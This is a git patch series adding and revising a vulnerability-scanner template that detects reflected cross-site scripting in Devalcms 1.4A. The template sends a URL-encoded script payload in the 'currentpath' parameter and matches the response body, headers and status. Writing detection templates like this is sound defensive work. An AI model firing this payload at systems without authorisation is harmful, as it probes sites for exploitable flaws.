From 9304c58b2c06b9e3e678d9d6fa5527e2ed696929 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:26:54 +0530
Subject: [PATCH 1/5] Create devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 32 +++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 vulnerabilities/other/devalcms-xss.yaml
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
new file mode 100644
index 0000000000..aef0e10860
--- /dev/null
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -0,0 +1,32 @@
+id: devalcms-xss
+
+info:
+ name: Devalcms 1.4A - Reflected Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ reference:
+ - https://www.exploit-db.com/exploits/6369
+ description: |
+ Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
+ tags: xss,unauthenticated,cms,reflected
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From 0f209ca08c57fc307ed0e4db71812de0a3bc48ac Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:31:44 +0530
Subject: [PATCH 2/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index aef0e10860..ab6a76239a 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -5,7 +5,7 @@ info:
author: arafatansari
severity: medium
reference:
- - https://www.exploit-db.com/exploits/6369
+ - https://www.exploit-db.com/exploits/6369
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
tags: xss,unauthenticated,cms,reflected
From 289f1731bbf27e662513865784c135ab22713d03 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:37:43 +0530
Subject: [PATCH 3/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index ab6a76239a..146dbbe0cd 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -29,4 +29,4 @@ requests:
- type: status
status:
- - 200
+ - 500
From 4b6aa7df8138c80f3f2f225fd20fe92a497149cd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:42:25 +0530
Subject: [PATCH 4/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 15 ++++++++-------
1 file changed, 8 insertions(+), 7 deletions(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index 146dbbe0cd..1c0eea4a5a 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -1,26 +1,27 @@
id: devalcms-xss
-
info:
- name: Devalcms 1.4A - Reflected Cross-Site Scripting
+ name: Devalcms 1.4A - Cross-Site Scripting
author: arafatansari
severity: medium
- reference:
- - https://www.exploit-db.com/exploits/6369
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
- tags: xss,unauthenticated,cms,reflected
+ reference:
+ - https://www.exploit-db.com/exploits/6369
+ metadata:
+ verified: true
+ tags: devalcms,xss,cms
requests:
- method: GET
path:
- - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- - ''
+ - 'sub menu for: '
- type: word
part: header